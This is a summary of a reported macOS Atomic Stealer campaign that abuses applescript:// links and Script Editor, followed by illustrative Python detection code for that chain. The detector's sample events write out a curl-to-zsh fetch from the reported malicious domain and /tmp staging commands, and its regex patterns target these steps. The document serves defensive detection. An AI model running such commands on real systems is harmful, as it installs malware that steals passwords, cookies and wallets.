Overview
- Jamf Threat Labs, which detailed the scheme Wednesday, says fake Apple‑themed storage‑cleanup pages use applescript:// links to open Script Editor from the browser.
- Script Editor, a built‑in macOS tool for running AppleScript and other scripts, appears with a prefilled script and tells the user to click Run.
- The script runs an obfuscated command that pipes curl output into zsh; it decodes a hidden URL and executes the fetched code in memory without writing it to disk.
- A second stage places a Mach‑O file in /tmp, removes security flags, makes it executable, and launches an Atomic Stealer variant that hunts passwords, cookies, Keychain data, and crypto wallets.
- The move avoids Apple’s new Terminal paste checks, and Jamf shared indicators such as the dryvecar[.]com domain so defenders can block the sites and treat any browser request to open scripting tools as high risk.
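As an added defender-side illustration (example code written for this summary, not Jamf's tooling or code from its report), the following Python scores constructed process events against the chain described above: a browser spawning Script Editor via an applescript:// link, curl piped into zsh, the quarantine attribute stripped from and the execute bit set on a file under /tmp, and any reference to the published dryvecar[.]com indicator. The event schema, rule names, severities and sample command lines are assumptions made for the example; only the domain comes from the summary.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Browsers that should never spawn a scripting tool on their own (assumed list).
BROWSERS = {"Safari", "Google Chrome", "Firefox", "Microsoft Edge", "Brave Browser"}
SCRIPT_TOOLS = {"Script Editor", "osascript"}

# Indicator published in the Jamf write-up (given defanged as dryvecar[.]com in the text).
BLOCKED_DOMAINS = {"dryvecar.com"}

# Remote content fetched with curl and piped straight into a shell.
CURL_TO_SHELL = re.compile(r"\bcurl\b[^|]*\|\s*(?:zsh|bash|sh)\b")
# xattr clearing all attributes (-c) or deleting the quarantine attribute on a /tmp path.
QUARANTINE_STRIP = re.compile(r"\bxattr\b.*(?:-c\b|-d\s+com\.apple\.quarantine).*?/(?:private/)?tmp/")
# Execute bit granted to a file under /tmp.
TMP_EXEC_BIT = re.compile(r"\bchmod\b.*\+x.*?/(?:private/)?tmp/")

# Rules that together reproduce the full browser -> Script Editor -> curl|zsh -> /tmp payload chain.
CHAIN = {"browser_opened_script_tool", "curl_piped_to_shell", "exec_bit_on_tmp_file"}


@dataclass(frozen=True)
class Finding:
    event_id: int
    rule: str
    severity: str


def refang(text: str) -> str:
    """Normalise defanged indicators (example[.]com, hxxp) so they match hostnames in telemetry."""
    return text.replace("[.]", ".").replace("hxxp", "http")


def evaluate(event: dict) -> list[Finding]:
    """Apply every rule to one process event and return the findings it triggers."""
    eid = event["id"]
    cmd = refang(event.get("cmdline", ""))
    parent, proc = event.get("parent", ""), event.get("process", "")
    hits: list[Finding] = []

    # 1. A web browser handing off to a scripting tool (the applescript:// handler) is high risk.
    if (proc in SCRIPT_TOOLS and parent in BROWSERS) or "applescript://" in cmd:
        hits.append(Finding(eid, "browser_opened_script_tool", "high"))
    # 2. Fetched code executed directly by a shell, never touching disk.
    if CURL_TO_SHELL.search(cmd):
        hits.append(Finding(eid, "curl_piped_to_shell", "high"))
    # 3. Second-stage staging in /tmp: quarantine removed, then made executable.
    if QUARANTINE_STRIP.search(cmd):
        hits.append(Finding(eid, "quarantine_removed_in_tmp", "medium"))
    if TMP_EXEC_BIT.search(cmd):
        hits.append(Finding(eid, "exec_bit_on_tmp_file", "medium"))
    # 4. Any reference to a domain from the published indicator list.
    for domain in BLOCKED_DOMAINS:
        if domain in cmd:
            hits.append(Finding(eid, f"blocked_domain:{domain}", "high"))
    return hits


def scan(events: list[dict]) -> list[Finding]:
    """Run all events through the rules, preserving event order."""
    findings: list[Finding] = []
    for ev in events:
        findings.extend(evaluate(ev))
    return findings


def chain_detected(findings: list[Finding]) -> bool:
    """True when the findings cover every stage of the chain, which warrants escalation."""
    return CHAIN <= {f.rule for f in findings}


# Constructed sample telemetry for one host; not real events from the report.
SAMPLE_EVENTS = [
    {"id": 1, "parent": "launchd", "process": "Safari",
     "cmdline": "/Applications/Safari.app/Contents/MacOS/Safari"},
    {"id": 2, "parent": "Safari", "process": "Script Editor",
     "cmdline": "Script Editor applescript://..."},  # link target truncated; constructed
    {"id": 3, "parent": "Script Editor", "process": "sh",
     "cmdline": "sh -c curl -fsSL https://dryvecar[.]com/ | zsh"},
    {"id": 4, "parent": "zsh", "process": "xattr", "cmdline": "xattr -c /tmp/update"},
    {"id": 5, "parent": "zsh", "process": "chmod", "cmdline": "chmod +x /tmp/update"},
    {"id": 6, "parent": "Terminal", "process": "zsh", "cmdline": "zsh -c brew update"},
]

if __name__ == "__main__":
    results = scan(SAMPLE_EVENTS)
    for f in results:
        print(f"event {f.event_id}: {f.rule} [{f.severity}]")
    print("full chain observed:", chain_detected(results))
```

Event 6, a normal Terminal session, produces no finding, which is the point of rule 1: the risk signal is not scripting tools in general but a browser as their parent. The chain check is what turns four medium/high alerts on one host into a single escalation.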